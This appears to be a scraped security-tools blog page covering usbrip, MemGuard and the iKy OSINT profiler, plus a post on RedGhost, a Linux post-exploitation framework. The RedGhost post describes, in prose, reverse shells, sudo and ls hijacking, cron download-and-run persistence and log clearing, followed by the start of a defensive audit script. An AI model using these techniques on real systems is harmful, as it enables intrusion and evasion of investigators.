<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip storage update <STORAGE_TYPE> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [--lvl <COMPRESSION_LEVEL>] [-q] [--debug]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Update storage — add USB events to the existing storage (7zip archive). COMPRESSION_LEVEL is a number in [0..9].</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip storage create <STORAGE_TYPE> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [--lvl <COMPRESSION_LEVEL>] [-q] [--debug]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Create storage — create 7zip archive and add USB events to it according to the selected options.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip storage passwd <STORAGE_TYPE> [--lvl <COMPRESSION_LEVEL>] [-q] [--debug]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Change password of the existing storage.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"># ---------- IDs ----------</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip ids search [--vid <VID>] [--pid <PID>] [--offline] [-q] [--debug]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Get extra details about a specific USB device by its <VID> and/or <PID> from the USB ID database.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip ids download [-q] [--debug]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Update (download) the USB ID database.</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Help</span></h3>
<b>To get a list of module names use:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip -h</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<b>To get a list of submodule names for a specific module use:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip <module> -h</span><br />
<br />
<b>To get a list of all switches for a specific submodule use:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip <module> <submodule> -h</span><br />
<h3 style="text-align: left;">
<span style="color: #073763;"><br />Examples</span></h3>
Show the event history of all USB devices, suppressing the banner, info messages and user interaction (<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-q, --quiet</span>), represented as a list (<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-l, --list</span>) limited to the latest 100 entries (<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-n NUMBER, --number NUMBER</span>):<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip events history -ql -n 100</span><br />
<br />
Show the event history of the external USB devices (<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-e, --external</span>, i.e. devices that were actually disconnected) represented as a table (<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-t, --table</span>) containing the "Connected", "VID", "PID", "Disconnected" and "Serial Number" columns (<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-c COLUMN [COLUMN ...], --column COLUMN [COLUMN ...]</span>), filtered by date (<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-d DATE [DATE ...], --date DATE [DATE ...]</span>), with the logs taken from external files (<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-f FILE [FILE ...], --file FILE [FILE ...]</span>):<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip events history -et -c conn vid pid disconn serial -d "Dec 9" "Dec 10" -f /var/log/syslog.1 /var/log/syslog.2.gz</span><br />
<br />
Build the event history of all USB devices and redirect the output to a file for further analysis. When the output stream is not a terminal (piped with | or redirected with >), usbrip emits no ANSI escape (colour) sequences, so the file can be processed as is. usbrip also prints some Unicode symbols, so it is worth converting the resulting file to UTF-8 (with enconv, for example) and, for portability to Windows tools, switching the newlines to CRLF (with awk, for example):<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip events history -t | awk '{ sub("$", "\r"); print }' > usbrip.out && enconv -x UTF8 usbrip.out</span><br />
<br />
Remark: you can strip the escape sequences yourself even from output that was captured from the terminal. Save that output as usbrip.out, add a gsub() for the ANSI control-sequence pattern, and write the cleaned copy to a new file (awk does not rewrite its input in place):<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ awk '{ sub("$", "\r"); gsub("\\x1B\\[[0-?]*[ -/]*[@-~]", ""); print }' usbrip.out > usbrip.clean && enconv -x UTF8 usbrip.clean</span><br />
<br />
Generate a list of trusted USB devices as a JSON file (trusted/auth.json) with the "VID" and "PID" attributes, containing the first three devices connected on September 26:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip events gen_auth trusted/auth.json -a vid pid -n 3 -d "Sep 26"</span><br />
<br />
Search the event history of the external USB devices for violations based on the list of trusted USB devices <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">(trusted/auth.json</span>) by "PID" attribute, restrict resulting events to those which have "Bob" as a user, "EvilUSBManufacturer" as a manufacturer, "1234567890" as a serial number and represent the output as a table with "Connected", "VID" and "PID" columns:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip events violations trusted/auth.json -a pid -et --user Bob --manufact EvilUSBManufacturer --serial 1234567890 -c conn vid pid</span><br />
<br />
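The three steps above (build the history, generate the trusted list, search it for violations) boil down to folding the kernel's per-line USB messages into one event per device and then matching the chosen attributes against a list. The following Python example is added here to show that logic end to end; it is not usbrip's own code and simplifies it considerably. The syslog excerpt, hostname, vendor/product IDs and strings in it are constructed, and the attribute names (vid, pid, prod, manufact, serial, port) are borrowed from usbrip's switches.<br />

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed syslog excerpt (not a real capture). It follows the kernel's usual
# "usb <port>: ..." message shapes: device 1-1 is plugged in and removed,
# device 2-1.4 is an untrusted stick, device 1-2 (a mouse) is never unplugged.
SAMPLE_SYSLOG = """\
Dec  9 10:15:01 lab kernel: [ 1234.567890] usb 1-1: new high-speed USB device number 3 using xhci_hcd
Dec  9 10:15:01 lab kernel: [ 1234.700000] usb 1-1: New USB device found, idVendor=0781, idProduct=5580
Dec  9 10:15:01 lab kernel: [ 1234.700100] usb 1-1: New USB device strings: Mfr=1, Product=2, SerialNumber=3
Dec  9 10:15:01 lab kernel: [ 1234.700200] usb 1-1: Product: Extreme
Dec  9 10:15:01 lab kernel: [ 1234.700300] usb 1-1: Manufacturer: SanDisk
Dec  9 10:15:01 lab kernel: [ 1234.700400] usb 1-1: SerialNumber: 4C530001234567890
Dec  9 10:42:17 lab kernel: [ 2870.100000] usb 1-1: USB disconnect, device number 3
Dec 10 08:03:44 lab kernel: [ 9000.000000] usb 2-1.4: new full-speed USB device number 5 using xhci_hcd
Dec 10 08:03:44 lab kernel: [ 9000.200000] usb 2-1.4: New USB device found, idVendor=abcd, idProduct=1234
Dec 10 08:03:44 lab kernel: [ 9000.200100] usb 2-1.4: Product: Keystroke Injector
Dec 10 08:03:44 lab kernel: [ 9000.200200] usb 2-1.4: Manufacturer: EvilUSBManufacturer
Dec 10 08:03:44 lab kernel: [ 9000.200300] usb 2-1.4: SerialNumber: 1234567890
Dec 10 08:05:02 lab kernel: [ 9078.000000] usb 2-1.4: USB disconnect, device number 5
Dec 10 09:00:00 lab kernel: [12300.000000] usb 1-2: New USB device found, idVendor=046d, idProduct=c077
Dec 10 09:00:00 lab kernel: [12300.000100] usb 1-2: Product: USB Optical Mouse
Dec 10 09:00:00 lab kernel: [12300.000200] usb 1-2: Manufacturer: Logitech
"""

# One syslog line: "<Mon dd HH:MM:SS> <host> kernel: [<uptime>] usb <port>: <message>"
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ kernel: "
    r"(?:\[\s*[\d.]+\] )?usb (?P<port>[\d.-]+): (?P<msg>.*)$"
)
FOUND_RE = re.compile(
    r"New USB device found, idVendor=(?P<vid>[0-9a-f]{4}), idProduct=(?P<pid>[0-9a-f]{4})"
)
# Kernel message prefix -> event attribute (names mirror usbrip's switches)
STRING_FIELDS = (("Product: ", "prod"), ("Manufacturer: ", "manufact"), ("SerialNumber: ", "serial"))


@dataclass
class UsbEvent:
    conn: str
    port: str
    vid: str
    pid: str
    prod: Optional[str] = None
    manufact: Optional[str] = None
    serial: Optional[str] = None
    disconn: Optional[str] = None  # stays None while the device is still attached


def parse_events(log_text: str) -> List[UsbEvent]:
    """Fold the per-line kernel messages into one event per plugged-in device.

    Events are keyed by port while open: "New USB device found" opens one, the
    Product/Manufacturer/SerialNumber lines fill it in, "USB disconnect" closes it.
    """
    events: List[UsbEvent] = []
    open_by_port: Dict[str, UsbEvent] = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a USB core message
        ts, port, msg = m["ts"], m["port"], m["msg"]
        found = FOUND_RE.match(msg)
        if found:
            ev = UsbEvent(conn=ts, port=port, vid=found["vid"], pid=found["pid"])
            events.append(ev)
            open_by_port[port] = ev  # a re-plug on the same port starts a new event
            continue
        ev = open_by_port.get(port)
        if ev is None:
            continue
        for prefix, attr in STRING_FIELDS:
            if msg.startswith(prefix):
                setattr(ev, attr, msg[len(prefix):])
                break
        else:
            if msg.startswith("USB disconnect"):
                ev.disconn = ts
                del open_by_port[port]
    return events


def gen_auth(events: List[UsbEvent], attributes: List[str]) -> List[dict]:
    """Like `events gen_auth -a ...`: one trusted entry per distinct device, limited to the chosen attributes."""
    trusted: List[dict] = []
    for ev in events:
        entry = {a: getattr(ev, a) for a in attributes}
        if entry not in trusted:
            trusted.append(entry)
    return trusted


def violations(events: List[UsbEvent], trusted: List[dict], attributes: List[str],
               external_only: bool = True) -> List[UsbEvent]:
    """Like `events violations -a ...`: events whose chosen attributes match no trusted entry.

    external_only mirrors -e: consider only devices that were actually disconnected.
    """
    bad = []
    for ev in events:
        if external_only and ev.disconn is None:
            continue
        if not any(all(getattr(ev, a) == t.get(a) for a in attributes) for t in trusted):
            bad.append(ev)
    return bad


if __name__ == "__main__":
    evs = parse_events(SAMPLE_SYSLOG)
    auth = gen_auth(evs[:1], ["vid", "pid"])  # trust only the first device, as -n 1 would
    for ev in violations(evs, auth, ["vid", "pid"]):
        print(f"VIOLATION {ev.conn} port={ev.port} {ev.vid}:{ev.pid} "
              f"{ev.manufact} {ev.prod} serial={ev.serial} disconn={ev.disconn}")
```

With the trusted list restricted to the first device (what -n 1 on gen_auth would give), the stick on port 2-1.4 is the only violation; the mouse on 1-2 is skipped because it was never disconnected, which is the behaviour of the -e switch. Matching on the serial alone is weaker than it looks: the kernel logs a SerialNumber line only when the device reports one, and a hostile device can report any string it likes, so combine it with VID/PID where you can.<br />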
Search for details about a specific USB device by its VID (--vid VID) and PID (--pid PID):<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip ids search --vid 0781 --pid 5580</span><br />
<br />
Download the latest version of <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">usb_ids/usb.ids</span> database (the source is <a href="http://www.linux-usb.org/usb.ids" target="_blank">here</a>):<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip ids download</span><br />
<br />
<span style="font-size: large;"><a href="https://github.com/snovvcrash/usbrip" target="_blank">Download USBrip</a></span></div>
Posted 2019-07-28: MemGuard- Secure Software Enclave For Storage of Sensitive Information in Memory<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOTMsD_ciKYYx47u6q3AXsqG3t2tVbdTNFSSA_uXJfmCTSCxJJVanKrMoO6ZspcXBk-O-fz2ODaN5Y5BVzPQKEipDfiEwt-J8v9MbwIPrKwAuFUx7Vhhm_vetD058gL0kRaw3aPoMUBSm3/s1600/Secure+Software.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="440" data-original-width="748" height="376" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOTMsD_ciKYYx47u6q3AXsqG3t2tVbdTNFSSA_uXJfmCTSCxJJVanKrMoO6ZspcXBk-O-fz2ODaN5Y5BVzPQKEipDfiEwt-J8v9MbwIPrKwAuFUx7Vhhm_vetD058gL0kRaw3aPoMUBSm3/s640/Secure+Software.png" width="640" /></a></div>
<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">MemGuard- Secure Software Enclave For Storage of Sensitive Information in Memory</span></h3>
<br />
This package attempts to reduce the likelihood of sensitive data being exposed. It supports all major operating systems and is written in pure Go.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Features</span></h3>
<br />
<ul style="text-align: left;">
<li>Sensitive data is encrypted and authenticated in memory using XSalsa20 and Poly1305 respectively. The scheme also defends against cold-boot attacks.</li>
<li>Memory allocation bypasses the language runtime by using system calls to query the kernel for resources directly. This avoids interference from the garbage-collector.</li>
<li>Buffers that store plaintext data are fortified with guard pages and canary values to detect spurious accesses and overflows.</li>
<li>Effort is taken to prevent sensitive data from touching the disk. This includes locking memory to prevent swapping and handling core dumps.</li>
<li>Kernel-level immutability is implemented so that attempted modification of protected regions results in an access violation.</li>
<li>Multiple endpoints provide session purging and safe termination capabilities as well as signal handling to prevent remnant data being left behind.</li>
<li>Timing side channels are mitigated by copying and comparing data in constant time.</li>
<li>Accidental memory leaks are mitigated by harnessing the garbage collector to automatically destroy containers that have become unreachable.</li>
</ul>
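Most of the features above are memory-hygiene measures rather than cryptography, and they can be illustrated without the library. The Python example below is an added illustration of that part of the design, written for this page and not taken from memguard: it keeps a secret between two random canaries, tries to pin the pages with mlock(2) through ctypes (assumed Linux/macOS libc; the call is best-effort and its result is reported via a flag), compares in constant time, wipes on destroy, and attaches a finalizer so a buffer that is merely dropped is still wiped. The XSalsa20/Poly1305 sealing, guard pages and kernel-level immutability are not reproduced.<br />

```python
import ctypes
import hmac
import secrets
import weakref

CANARY_LEN = 16  # random bytes placed on each side of the secret


def _try_mlock(buf: bytearray) -> bool:
    """Best-effort mlock(2) through ctypes so the pages cannot be swapped to disk.

    Assumes a libc that exports mlock (Linux/macOS). Returns False rather than raising
    when the symbol is missing or the call fails (for instance RLIMIT_MEMLOCK exhausted).
    """
    try:
        libc = ctypes.CDLL(None, use_errno=True)
        mlock = libc.mlock
    except (OSError, AttributeError, TypeError):
        return False
    mlock.argtypes = [ctypes.c_void_p, ctypes.c_size_t]
    mlock.restype = ctypes.c_int
    view = (ctypes.c_char * len(buf)).from_buffer(buf)  # address of the bytearray's storage
    return mlock(ctypes.addressof(view), len(buf)) == 0


def _wipe(store: bytearray) -> None:
    """Overwrite every byte in place (index assignment keeps the same allocation)."""
    for i in range(len(store)):
        store[i] = 0


class GuardedBuffer:
    """Plaintext container in the spirit of memguard's fortified buffers.

    Layout of _store: [front canary][secret][back canary]. Any write that runs past
    the secret lands in the back canary and is caught on the next access.
    """

    def __init__(self, size: int):
        self._size = size
        self._front = secrets.token_bytes(CANARY_LEN)
        self._back = secrets.token_bytes(CANARY_LEN)
        self._store = bytearray(self._front + bytes(size) + self._back)
        self.locked = _try_mlock(self._store)
        self.alive = True
        # Runs _wipe when the object becomes unreachable or at interpreter exit
        self._finalizer = weakref.finalize(self, _wipe, self._store)

    def _check(self) -> None:
        if not self.alive:
            raise RuntimeError("buffer already destroyed")
        front = bytes(self._store[:CANARY_LEN])
        back = bytes(self._store[CANARY_LEN + self._size:])
        if not (hmac.compare_digest(front, self._front) and hmac.compare_digest(back, self._back)):
            self.destroy()  # never hand out data from a region that was written past
            raise MemoryError("canary mismatch: overflow or tampering detected")

    @property
    def data(self) -> memoryview:
        """Writable window onto the secret only (canaries stay out of reach)."""
        self._check()
        return memoryview(self._store)[CANARY_LEN:CANARY_LEN + self._size]

    def equals(self, other: bytes) -> bool:
        """Constant-time comparison so a wrong guess leaks no timing information."""
        return hmac.compare_digest(bytes(self.data), other)

    def destroy(self) -> None:
        if self.alive:
            self.alive = False
            self._finalizer()  # wipe now; a finalizer runs at most once


def detects_overflow() -> bool:
    """Write one byte past the secret and confirm the next access refuses to serve it."""
    gb = GuardedBuffer(8)
    gb._store[CANARY_LEN + 8] ^= 0xFF  # clobber the first byte of the back canary
    try:
        gb.data
    except MemoryError:
        return not gb.alive  # the buffer must also have been destroyed
    return False


if __name__ == "__main__":
    key = secrets.token_bytes(32)
    gb = GuardedBuffer(32)
    gb.data[:] = key
    print("locked in RAM:", gb.locked, "matches:", gb.equals(key))
    gb.destroy()
    print("wiped:", not any(gb._store), "overflow caught:", detects_overflow())
```

Two caveats before relying on something like this in Python: the interpreter copies bytes freely (every bytes() call above makes a copy the wiper never sees, as does string formatting), which is exactly the runtime interference memguard sidesteps by allocating outside Go's heap; and mlock can fail quietly under RLIMIT_MEMLOCK, so check the locked flag rather than assuming it.<br />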
<br />
Some features were inspired by <a href="https://github.com/jedisct1/libsodium" target="_blank">libsodium</a>, so credits to them.<br />
<br />
Full documentation and a complete overview of the API can be found <a href="https://godoc.org/github.com/awnumar/memguard" target="_blank">here</a>. Interesting and useful code samples can be found within the <a href="https://github.com/awnumar/memguard/blob/master/examples" target="_blank">examples</a> subpackage.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Installation</span></h3>
<span style="background-color: #f3f3f3; color: #274e13; font-family: Courier New, Courier, monospace;">$ go get github.com/awnumar/memguard</span><br />
<br />
We strongly encourage you to pin a specific version for a clean and reliable build. This can be accomplished using modules.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Contributing</span></h3>
Ways to contribute include:<br />
<ul style="text-align: left;">
<li>Using the package and identifying points of friction.</li>
<li>Reading the source code and looking for improvements.</li>
<li>Adding interesting and useful program samples to ./examples.</li>
<li>Developing Proof-of-Concept attacks and mitigations.</li>
<li>Improving compatibility with more kernels and architectures.</li>
<li>Implementing kernel-specific and cpu-specific protections.</li>
<li>Writing useful security and crypto libraries that utilise memguard.</li>
<li>Submitting performance improvements or benchmarking code.</li>
</ul>
<br />
Issues are for reporting bugs and for discussion on proposals. Pull requests should be made against master.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Future goals</span></h3>
<br />
<ul style="text-align: left;">
<li>Ability to stream data to and from encrypted enclave objects.</li>
<li>Catch segmentation faults to wipe memory before crashing.</li>
<li>Evaluate and improve the strategies in place, particularly for <a href="https://github.com/awnumar/memguard/blob/master/core/coffer.go" target="_blank">Coffer</a> objects.</li>
<li>Formalise a threat model and evaluate our performance in regards to it.</li>
<li>Use lessons learned to apply patches upstream to the Go language and runtime.</li>
</ul>
<div>
<a href="https://github.com/awnumar/memguard" target="_blank"><span style="font-size: large;">Download MemGuard</span></a></div>
</div>
Posted 2019-07-22: iKy OSINT Project - To Collect Information From E-Mail With GUI<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9_5RIL9UrLvn9eqXbI4HUJx8xU885GOBgPeRbgTTChHIQD7W1uKmQ5exp9hFZXXata_2eqL5CaYJ-5afqjSXoRPK2GtlhZPk33yUYHPbGJnq1VpCaMWPn5eo-sD9204YaSSEW6dsJ1vJr/s1600/iKY+Project.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="429" data-original-width="705" height="389" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9_5RIL9UrLvn9eqXbI4HUJx8xU885GOBgPeRbgTTChHIQD7W1uKmQ5exp9hFZXXata_2eqL5CaYJ-5afqjSXoRPK2GtlhZPk33yUYHPbGJnq1VpCaMWPn5eo-sD9204YaSSEW6dsJ1vJr/s640/iKY+Project.png" width="640" /></a></div>
<br />
<h2 style="text-align: left;">
<span style="color: #073763;">iky OSINT Project. Collect information from a mail. Gather, Profile, Timeline.</span></h2>
<br />
Project iKy collects information starting from an email address and shows the results in a visual interface.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Installation</span></h3>
<div>
<span style="color: #073763;"><br /></span></div>
<b>Clone repository</b><br />
<b><br /></b>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">git clone https://gitlab.com/kennbroorg/iKy.git</span><br />
<h3 style="text-align: left;">
<span style="color: #073763;">Install Backend</span></h3>
<b><span style="color: #073763;">Redis</span></b><br />
<br />
<b>You must install Redis.</b> The commands below fetch the upstream tarball over plain HTTP with no signature or checksum verification; where your distribution packages Redis, that package is the simpler and safer option.<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">wget http://download.redis.io/redis-stable.tar.gz</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">tar xvzf redis-stable.tar.gz</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">cd redis-stable</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">make</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">sudo make install</span><br />
<br />
<b>Then start the server in a terminal:</b><br />
<b><br /></b>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">redis-server</span><br />
<br />
<b>Python stuff and Celery</b><br />
<br />
Install the Python libraries listed in requirements.txt:<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">pip install -r requirements.txt</span><br />
<br />
Then start Celery in a second terminal, from the backend directory:<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">./celery.sh</span><br />
<br />
Finally, in a third terminal, start the backend app from the backend directory:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">python app.py</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Install Frontend</span></h3>
<b>Node</b><br />
<br />
First of all, install <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">nodejs</span>.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Dependencies</span></h3>
Inside the directory frontend install the dependencies<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">npm install</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Turn on Frontend Server</span></h3>
Finally, to run frontend server, execute:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">npm start</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<h3 style="text-align: left;">
<span style="color: #073763;">Browser</span></h3>
Open this <a href="http://127.0.0.1:4200/" target="_blank">URL</a> in the browser.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Config API Keys</span></h3>
Once the application is loaded in the browser, open the Api Keys option and enter the values of the API keys that are needed.<br />
<ul style="text-align: left;">
<li>Fullcontact: Generate the API keys from <a href="https://support.fullcontact.com/hc/en-us/articles/115003415888-Getting-Started-FullContact-v2-APIs" target="_blank">here</a></li>
<li>Twitter: Generate the API keys from <a href="https://developer.twitter.com/en/docs/basics/authentication/guides/access-tokens.html" target="_blank">here</a></li>
<li>Linkedin: Only the username and password of your account need to be entered</li>
</ul>
<div>
<h3 style="text-align: left;">
<span style="color: #073763;">Video Demo</span></h3>
</div>
<div>
<iframe allowfullscreen="" frameborder="0" height="360" src="https://player.vimeo.com/video/326114716" title="vimeo-player" width="640"></iframe>
<br />
<div>
<br /></div>
<div>
<br /></div>
<div>
<span style="font-size: large;"><a href="https://github.com/kennbroorg/iKy" target="_blank">Download iKY Project</a></span></div>
</div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8244923499446330076.post-74272745568898240952019-07-19T14:00:00.000+05:302019-10-21T17:53:59.549+05:30RedGhost - Linux Post Exploitation Framework<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjV8256m_wp4G7b5QIvVzJ2LC5It3j_tTMK2OOAOckIwp8ifC_0zC5ib3MOm2YZv6TTJlaSFr4nuC83JFv9BJmiS0lOHBqHDPjBFzsfvhXXRl-c5LiKmBf981enT21Ttx0h5Doo4sEuPSHs/s1600/RedGhost.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="RedGhost - Linux Post Exploitation Framework" border="0" data-original-height="582" data-original-width="1080" height="344" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjV8256m_wp4G7b5QIvVzJ2LC5It3j_tTMK2OOAOckIwp8ifC_0zC5ib3MOm2YZv6TTJlaSFr4nuC83JFv9BJmiS0lOHBqHDPjBFzsfvhXXRl-c5LiKmBf981enT21Ttx0h5Doo4sEuPSHs/s640/RedGhost.png" title="RedGhost - Linux Post Exploitation Framework" width="640" /></a></div>
<br />
<h2 style="text-align: left;">
<span style="color: #073763;">RedGhost- Linux post exploitation framework </span></h2>
<h3 style="text-align: left;">
<span style="color: #073763;"><br />It is designed to assist red teams with persistence, reconnaissance, privilege escalation and leaving no trace.</span></h3>
<br />
<ul style="text-align: left;">
<li><b>Payloads</b></li>
</ul>
Function to generate various encoded reverse shells in netcat, bash, python, php, ruby, perl<br />
<br />
<ul style="text-align: left;">
<li><b>SudoInject</b></li>
</ul>
Function to wrap the "sudo" command in a shell function so that a reverse root shell is launched every time "sudo" is run, for privilege escalation<br />
<br />
<ul style="text-align: left;">
<li><b>lsInject</b></li>
</ul>
Function to wrap the "ls" command in a shell function so that the payload is run every time "ls" is run, for persistence<br />
<br />
<ul style="text-align: left;">
<li><b>Crontab</b></li>
</ul>
Function to create a cron job that downloads a payload from a remote server and runs it every minute, for persistence<br />
<br />
<ul style="text-align: left;">
<li><b>GetRoot</b></li>
</ul>
Function to try various methods to escalate privileges<br />
<br />
<ul style="text-align: left;">
<li><b>Clearlogs</b></li>
</ul>
Function to clear logs and make forensic investigation difficult<br />
<br />
<ul style="text-align: left;">
<li><b>MassInfoGrab</b></li>
</ul>
Function to grab mass reconnaissance information on the system<br />
<br />
<ul style="text-align: left;">
<li><b>CheckVM</b></li>
</ul>
Function to check if the system is a virtual machine<br />
<br />
<ul style="text-align: left;">
<li><b>MemoryExec</b></li>
</ul>
Function to execute remote bash script in memory<br />
<br />
<ul style="text-align: left;">
<li><b>BanIp</b></li>
</ul>
Function to ban an IP address using iptables<br />
<br />
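The persistence and escalation tricks listed above (shell functions that shadow sudo or ls in a user's startup file, a cron job that fetches a remote script every minute and runs it) all leave plain-text artefacts that a defender can audit. The following is an added example written for this page, not RedGhost code: it scans constructed rc-file and crontab content for exactly those artefacts. The watch list of shadowed binaries, the regular expressions and the sample lines are assumptions made for the example.<br />

```python
"""Audit shell startup files and crontabs for command-wrapper and cron persistence.

Added defensive example, not RedGhost code. Two checks:
 1. a shell function or alias in a startup file that shadows a core binary
    (sudo, ls, ...), which is how command-wrapper persistence survives logins;
 2. a cron line that runs every minute AND fetches something with wget/curl
    AND hands it to an interpreter.
All sample file contents below are constructed for the example.
"""
import re

# Hypothetical watch list: binaries whose shadowing by a function is suspicious.
SHADOWED_BINARIES = ("sudo", "ls", "ssh", "su", "passwd")

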